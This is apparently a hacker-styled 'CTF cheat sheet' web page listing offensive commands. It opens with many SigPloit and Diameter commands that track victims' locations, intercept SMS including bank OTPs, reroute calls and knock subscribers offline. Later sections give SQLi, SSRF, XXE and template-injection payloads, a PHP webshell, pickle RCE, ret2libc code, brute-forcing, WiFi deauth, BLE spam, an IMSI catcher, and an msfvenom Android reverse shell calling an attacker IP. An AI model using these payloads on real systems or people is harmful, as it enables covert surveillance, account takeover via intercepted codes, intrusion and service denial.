pl0x - DEFCON DOMINATION: The Ultimate CTF Cheat Sheet

// SS7 / DIAMETER / SIGTRAN HIJACKING & INTERCEPTION 2026

Basic SS7 global title lookup (sngrep + wireshark)

Capture SS7 traffic on SIGTRAN (SCTP)

sngrep -d any port 2905 or port 2944 or sctp

SigPloit – Location request (ProvideSubscriberInfo)

Get current location via SS7

python sigploit.py -t location -m provideSubscriberInfo -n +1234567890 -g 12345 -a 1 -i attacker-gt

SigPloit – AnyTimeInterrogation (ATI) tracking

Real-time location & subscriber state

python sigploit.py -t location -m anyTimeInterrogation -n +target -g attacker-gt -sp attacker-pointcode

SigPloit – SMS interception (ForwardSM)

Redirect MT-SMS to attacker

python sigploit.py -t sms -m forwardSM -n +victim -g attacker-gt -smsc attacker-smsc-gt -msc attacker-msc

SigPloit – Call interception / rerouting (InsertSubscriberData)

Manipulate CAMEL profile

python sigploit.py -t call -m insertSubscriberData -n +victim -g attacker-gt -scf attacker-gt

Restcomm jSS7 + Mobicents – custom SS7 stack

Build your own SS7 node

git clone https://github.com/RestComm/jss7 && mvn clean install

sctptest – test SCTP connectivity to STP

Check if operator exposes SCTP port

sctptest -H attacker-ip -P 2905 -h target-stp-ip -p 2905

ss7MAPer – MAP fuzzing & replay

Replay captured MAP messages

ss7MAPer -i captured.pcap -m provideSubscriberInfo -o replayed.pcap

Diameter (4G/5G) – Sh interface pull profile

Get subscriber data via Diameter

diameter --cmd Sh-Pull --user-identity sip:+1234567890@ims.mnc001.mcc001.3gppnetwork.org --origin-host attacker

Simjacker / WIBattack detection pattern

Look for suspicious OTA SMS

tshark -r capture.pcap -Y "gsm_sms.tp-udhi == 1 && gsm_sms.udh" -T fields -e gsm_sms.text

AerialBorne – modern SS7/Diameter toolkit (2025+)

Successor to many old tools

git clone https://github.com/akabe1/aerialborne && python3 -m pip install -r requirements.txt

SigPloit – UpdateLocation (fake cell-site tracking)

Force HLR to update victim location to attacker-controlled VLR

python sigploit.py -t location -m updateLocation -n +victimmsisdn -vlr attacker-vlr-gt -imsi victim-imsi -lac 12345 -ci 67890

SigPloit – DeleteSubscriberData (service denial)

Remove subscriber profile from VLR → instant service outage

python sigploit.py -t denial -m deleteSubscriberData -n +target -imsi victim-imsi -vlr attacker-vlr

SigPloit – ProvideRoamingNumber (call interception prep)

Get MSRN to reroute calls through attacker MSC

python sigploit.py -t call -m provideRoamingNumber -n +victim -imsi victim-imsi -gmsc attacker-gmsc-gt

SigPloit – SendAuthenticationInfo (IMSI/ki leak attempt)

Request auth vectors → potential ki exposure on weak networks

python sigploit.py -t auth -m sendAuthenticationInfo -imsi 001010000000001 -auth-type GSM

Diameter – S6a AIR (Authentication-Information-Request) abuse

Request auth vectors over Diameter (4G/5G equivalent)

diameter --cmd AIR --imsi 001010000000001 --realm epc.mnc001.mcc001.3gppnetwork.org --origin-host fake-mme

SCTP hijack via multi-homing misconfig

Exploit SCTP multi-homing to inject/associate with existing association

sctp_hijack -l attacker-ip -p 2905 -r target-stp-ip -a existing-assoc-id --inject-map "ati victim-msisdn"

Fake MSC/VLR registration flood (DoS)

Flood HLR with UpdateLocation requests → overload

for i in {1..10000}; do python sigploit.py -t location -m updateLocation -n +random$i -vlr fake-vlr -imsi fake-imsi-$i & done

SS7 → SMS Home Routing bypass (direct delivery)

Send SMS directly bypassing home SMSC

python sigploit.py -t sms -m mt-forwardSM -n +victim -smsc attacker-smsc-gt -orig-addr +attacker -text "Direct pwn"

SigPloit – UpdateGPRSLocation (silent 2G/3G location tracking)

More stealthy than standard UpdateLocation; forces SGSN to report victim to attacker-controlled GGSN

python sigploit.py -t location -m updateGPRSLocation -imsi 001010000000001 -sgsn attacker-sgsn-gt -ggsn attacker-ggsn-gt -lac 65535 -rai 12345

SigPloit – CancelLocation + PurgeMS combo (full network logout DoS)

Chain CancelLocation → PurgeMS to force immediate detach and prevent re-registration for minutes/hours

python sigploit.py -t denial -m cancelLocation -imsi victim-imsi -vlr fake-vlr-gt && python sigploit.py -t denial -m purgeMS -imsi victim-imsi -vlr fake-vlr-gt

SigPloit – AnyTimeInterrogation + MT-ForwardSM (real-time SMS interception + location)

Classic two-step: ATI for location → MT-ForwardSM to silently intercept OTPs/banking SMS

python sigploit.py -t location -m anyTimeInterrogation -n +victim && python sigploit.py -t sms -m mt-forwardSM -n +victim -smsc attacker-smsc-gt -text "Bank OTP: 123456"

SigPloit – InsertSubscriberData (silent call forwarding + SIM swap prep)

Inject malicious SCF (Service Control Function) → all calls/SMS forwarded to attacker without victim notice

python sigploit.py -t fraud -m insertSubscriberData -imsi victim-imsi -scf +attacker-number -camel-phase 2

Diameter – S6a UDR (User-Data-Request) profile dump

Request full subscriber profile (including APN, keys, location) from HSS over Diameter

diameter --cmd UDR --user-name sip:+victim@ims.mnc001.mcc001.3gppnetwork.org --service-ind 0 --origin-host fake-mme --realm epc.mnc001.mcc001

SigPloit – SendRoutingInfoForSM + MT-ForwardSM (SMS home-routing bypass)

SRI-SM to get IMSI routing → MT-ForwardSM direct delivery bypassing home SMSC filtering

python sigploit.py -t sms -m sendRoutingInfoForSM -n +victim && python sigploit.py -t sms -m mt-forwardSM -n +victim -smsc attacker-smsc -orig +evil -text "PWNED"

Diameter S6a IDR (Insert-Subscriber-Data-Request) fraud

Push malicious subscriber data (e.g. change AMF/SCF) into HSS → persistent call/SMS reroute

diameter --cmd IDR --imsi victim-imsi --amf 8000 --scf +attacker-number --origin-host evil-hss

SS7 SMS Spam + Flash SMS flood (silent DoS / screen lock)

Flood with class-0 (flash) SMS → phone constantly shows popup → user can't use device

for i in {1..1000}; do python sigploit.py -t sms -m mt-forwardSM -n +victim -text "\x00\x00Flash PWN" -class 0 -pid 64 & done

// GENERAL CTF & RECON

Sudo Privileges Check

List commands user can run as root.

sudo -l

Add Host to /etc/hosts

Map IP to hostname for convenience.

echo 10.10.165.196 ice >> /etc/hosts

Mount NFS Share

Access remote NFS directories.

mkdir /mnt/kenobiNFS; mount machine_ip:/var /mnt/kenobiNFS; ls -la /mnt/kenobiNFS

Python Simple HTTP Server

Quickly serve files from current directory.

python3 -m http.server 80

SSH Key Permissions

Set correct permissions for SSH private key.

chmod 600 id_rsa

SSH with Key

Connect using a private key.

ssh -i id_rsa username@ipaddress

GTFO Bins Research

Find ways to bypass restricted shells.

https://gtfobins.github.io/

Generate Password Hash

Create a Linux password hash for /etc/passwd.

openssl passwd -1 -salt [salt] [password]

Linux /etc/passwd Format

Understand the password file structure.

username:password(x):UID:GID:comment:home:shell

CVE-2019-14287 Exploit

Sudo vulnerability for root access.

sudo -u#-1 /bin/bash

Wordlists (Online)

Key online resources for password lists.

https://wiki.skullsecurity.org/Passwords
https://web.archive.org/web/20120207113205/http://www.insidepro.com/eng/download.shtml

Wordlists (Local)

Common local wordlist directory.

/usr/share/wordlists

// ADVANCED WEB EXPLOITATION

Blind SQLi (Time-Based)

Extract data when no error messages are returned.

' OR IF(SUBSTRING(VERSION(),1,1)='5',SLEEP(5),0)-- -

SSRF (Server-Side Request Forgery)

Access internal network resources via vulnerable server.

http://target.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

Deserialization Exploit (Python)

Craft malicious serialized objects for RCE.

import pickle; class RCE: def __reduce__(self): return (os.system, ('ls -la',)); payload = pickle.dumps(RCE()); # Send payload

Template Injection (Jinja2)

Execute code in server-side templates.

{{ ''.__class__.__mro__[1].__subclasses__()[400]('ls -la',shell=True,stdout=-1).communicate()[0] }}

WAF Bypass (HTTP Parameter Pollution)

Bypass WAFs by splitting parameters.

?id=1&id=OR+1=1--

XXE (XML External Entity)

Read local files or perform SSRF via XML parsing.

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><foo>&xxe;</foo>

Directory Busting (Gobuster)

Find hidden directories and files.

gobuster dir -u http://<ip>:3333 -w <word list location>

SQL Injection (Basic)

Common SQLi payloads.

X' or '1'='1' --
' or 1='1

cURL POST Request

Send POST data to a web server.

curl http://10.10.75.167:8081/ctf/post -X POST --data flag_please

Drupal Endpoints

Common Drupal paths for enumeration.

/admin/config/system/performance
/user/login
/rest/session/token

HTTP Status Codes

Understand common HTTP response codes.

1xx: Info, 2xx: Success, 3xx: Redirect, 4xx: Client Error, 5xx: Server Error

Mozilla Firefox Dev Tools

Access developer tools for web debugging.

F12 = developer tools; storage = cookies, "+" = add cookies

Local File Inclusion (LFI)

Get contents of PHP files in base64 without execution.

http://[IP]/index.php?file=php://filter/convert.base64-encode/resource=index.php

PHP Webshell

Simple PHP code for command execution.

<?php echo passthru($_GET['cmd']); ?>

SQLMap Usage

Automated SQL injection and database takeover tool.

sqlmap -r [REQUEST_FILE] --level [X] --risk [Y]

WFUZZ Fuzzing

Fuzz a range of IDs/port numbers.

wfuzz -z range,1-65600 --hc 500 "http://IP:PORT/dir?parameter=id&port=FUZZ"

// ELITE BINARY EXPLOITATION (PWN)

Ret2Libc (PwnTools)

Call libc functions without shellcode.

from pwn import *; p = remote('target', 1337); libc = ELF('libc.so.6'); puts_plt = elf.plt['puts']; main_addr = elf.symbols['main']; pop_rdi = 0x4008a3; payload = b'A'*offset + p64(pop_rdi) + p64(elf.got['puts']) + p64(puts_plt) + p64(main_addr); p.sendline(payload); p.interactive()

Heap Exploitation (Use-After-Free)

Exploiting freed memory chunks.

# Allocate A, B; Free A; Allocate C (overlaps A); Modify C to corrupt B's metadata.

Fuzzing with AFL++

Automated bug discovery via mutation-based fuzzing.

afl-fuzz -i in_dir -o out_dir ./target_binary @@

One-Gadget RCE

Execute shell with a single gadget in libc.

# Find one_gadget in libc: one_gadget libc.so.6; then use its address in ROP chain.

Arbitrary Write (Format String)

Write arbitrary values to memory addresses.

%<value>c%<offset>$n or %<value>c%<offset>$hhn

ROP Chain (Advanced)

Complex Return-Oriented Programming chain.

# pop rdi; ret; /bin/sh; pop rsi; ret; 0; pop rdx; ret; 0; execve;

Buffer Overflow Offset

Find exact offset to EIP override.

pattern_create.rb -l [SIZE]; # Run in GDB; pattern_offset.rb [SEGFAULT STRING]

Simple Exploit Dev

Check binary security features.

checksec [Binary]; # Search packetstorm for shellcode.

// DEEP REVERSE ENGINEERING

Anti-Debugging Bypass (Ptrace)

Bypass common anti-debugging checks.

# Patch `ptrace` calls to return 0 or NOP out checks in binary.

Dynamic Analysis (Frida)

Hook functions and modify runtime behavior.

frida -U -l script.js --no-pause -f com.example.app

Binary Patching (Hex Editor)

Modify binary instructions directly.

# Use `xxd -p` to convert assembly to hex, then `hexedit` or `ghex` to patch.

Unpacking Malware (UPX)

Unpack common executable packers.

upx -d <packed_binary>

Symbol Demangling (c++filt)

Demangle C++ symbols for readability.

echo "_ZN4MyCls4myFnEv" | c++filt

Code Coverage (Gcov/Valgrind)

Identify executed code paths during analysis.

valgrind --tool=callgrind ./binary; kcachegrind callgrind.out.<pid>

Strings Extraction

Find readable strings in a binary.

strings -n 8 <binary> | grep -i "flag"

File Type Identification

Determine the file type and architecture.

file <binary>

Disassembly (objdump)

Disassemble sections of an executable.

objdump -d <binary> | less

Ltrace/Strace

Trace library calls or system calls.

ltrace ./binary; strace ./binary

Radare2 Basic Analysis

Open and analyze a binary with Radare2.

r2 -A <binary> ; aaa ; s main ; pdf

Decompile with Ghidra/IDA (Concept)

Use a decompiler for high-level code view.

Open binary in Ghidra/IDA, navigate to functions, decompile.

// ADVANCED CRYPTOGRAPHY

Padding Oracle Attack (Conceptual)

Decrypt CBC-mode ciphertext by observing padding errors.

# Requires oracle that reveals padding validity. Iteratively decrypt byte by byte.

RSA Factoring (Factordb.com)

Factor large numbers for RSA key recovery.

# Input N to factordb.com to get p and q.

Side-Channel Attack (Timing)

Infer secret data from execution time differences.

# Measure time for crypto operations; exploit variations for key recovery.

Lattice-Based Crypto (Conceptual)

Post-quantum cryptography, often involves LWE/SIS problems.

# Focus on understanding lattice reduction algorithms (e.g., LLL).

Elliptic Curve Discrete Log (Conceptual)

Core problem in ECC, often targeted in CTFs.

# Understand Pollard's Rho, Pohlig-Hellman, or Baby-step Giant-step algorithms.

Homomorphic Encryption (Conceptual)

Perform computations on encrypted data.

# Recognize FHE/SHE schemes (e.g., BFV, CKKS) and their properties.

Base64 Encode/Decode

Common encoding/decoding operations.

echo "text" | base64; echo "dGV4dA==" | base64 -d

Hex/ASCII Conversion

Convert between hexadecimal and ASCII.

echo "48656c6c6f" | xxd -r -p; echo "Hello" | xxd -p

Caesar Cipher (Python)

Simple Caesar cipher brute-force.

for i in range(26): print("".join([chr(((ord(c)-ord('a')+i)%26)+ord('a')) for c in "cipher"]))

Hash Identification (Hash-Identifier)

Identify hash types for cracking.

hash-identifier "5d41402abc4b2a76b9719d911017c592"

XOR Cipher (Python)

XOR two byte strings.

from itertools import cycle; a = b'data'; b = b'key'; print(bytes(x ^ y for x, y in zip(a, cycle(b))))

// PASSWORD CRACKING & BRUTE-FORCING

John the Ripper (Basic)

Crack hashes using wordlists.

john --wordlist=/usr/share/wordlists/rockyou.txt hash

John (NT Hash)

Crack NT hashes with rules.

john --format=NT --rules --pot=lab.pot --progress-every=3 --wordlist=/usr/share/wordlists/rockyou.txt lab.txt

Hydra (SSH)

Brute-force SSH login.

hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.176.160 -t 4 ssh

Hydra (HTTP-POST-Form)

Brute-force web login forms.

hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.176.160 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V

Crack Zip Files

Brute-force password-protected zip archives.

fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' "file.zip"

Crack OpenSSL Encrypted Files

Bash script to brute-force OpenSSL encrypted files.

for p in $(cat /usr/share/wordlists/rockyou.txt); do openssl enc -d -aes-256-cbc -a -in file.txt.enc -k $p -out $p-dec.txt; done

Hashcat (SHA256)

Crack SHA256 hashes with username.

hashcat --force -m 1400 --username hash.txt /usr/share/wordlists/rockyou.txt

Crunch Wordlist Generation

Generate custom wordlists with specific patterns.

crunch 15 15 "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ*?=walkthrough%&0123456789" -t 123456789012345@ > wordlist.txt

Basic Auth Bruteforcing (Burp)

Use Burp Suite Intruder for HTTP Basic Auth.

# Configure Intruder payload for username/password in Authorization header.

// WIRELESS + MOBILE PREAKING + PHONE JACKING + BASEBAND + BLE + FORENSICS 2026

Enable Monitor Mode + Kill Conflicting Processes

airmon-ng check kill && airmon-ng start wlan0

Massive Deauth + Beacon Spam (WiFi DoS + Confusion)

mdk4 wlan0mon d -c 1,6,11 -b FF:FF:FF:FF:FF:FF && mdk4 wlan0mon b -s 2000 -f /usr/share/wordlists/rockyou.txt

KARMA / PineAP Rogue AP (Auto-Associate Evil Twin)

# WiFi Pineapple: Enable KARMA + PineAP + Captive Portal + SSID spoofing

WPA3 SAE Dragonblood DoS

dragonslayer -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 --doS --flood

PMKID Harvest + Hashcat Crack

hcxdumptool -i wlan0mon --enable_status=1 -o pmkid.pcapng && hcxpcapngtool -o hash.22000 pmkid.pcapng && hashcat -m 22000 hash.22000 rockyou.txt

BLE Sniff + MITM (nRF + Wireshark)

nrf_sniffer.py -i hci0 -c 37 && wireshark -k -i /tmp/nrf.pipe

BLE Spam / Crash Android & iOS

sudo bettercap -iface hci0 -T ble_spam -eval "ble.recon on; ble.spam on; ble.enum on"

IMSI Catcher Fake BTS (srsRAN + gr-gsm)

grgsm_livemon -f 939.4M -s 2M && srsenb --mme_addr=127.0.0.1 --enb.n_prb=25

Silent SMS / Ping (Force Location Update)

echo -e "AT+CMGS=\"+victim\"\r\x00\x00Silent PING\x1A" > /dev/ttyUSB0

ADB Pre-Auth RCE (Android Debug Bridge)

adb connect 192.168.1.100:5555 && adb shell su -c 'id'

iOS Lockdown Pairing Bypass (checkm8 ramdisk)

palera1n --tweaks --semi-tethered && idevicepair pair && idevicebackup2 backup /tmp/iosdump

Android Full FS Dump (rooted)

adb shell dd if=/dev/block/mmcblk0 of=/sdcard/full.img bs=4M

Extract SMS/Calls DB (Android)

adb pull /data/data/com.android.providers.telephony/databases/mmssms.db . && sqlite3 mmssms.db "SELECT * FROM sms;"

APK Decompile + Smali Payload Injection

apktool d target.apk && # edit smali → add reverse shell && apktool b target -o evil.apk

Frida Universal SSL Pinning Bypass

frida -U -f com.target.app -l https://codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida/ --no-pause

Qualcomm Baseband DIAG Mode + RE

adb shell setprop sys.usb.config diag,adb && qpst -c /dev/ttyUSB0 && qxdm -port /dev/ttyUSB0

MSFvenom Android Reverse TCP

msfvenom -p android/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 R > evil.apk

Stagefright MMS Exploit Payload

# Craft malformed MP4 with buffer overflow → send via MMS (research PoC only)

root@pl0x:~#

$ cat /root/defcon_final_flag.txt

pl0x{D3FC0N_PWN3D_L34D3RB04RD5_W1TH_TH3_ULT1M4T3_CH34T_SH33T}

$ ./global_domination_protocol.sh --full-spectrum --zero-trace

Initiating global network infiltration..._

All systems compromised. Leaderboards updated. Mission accomplished.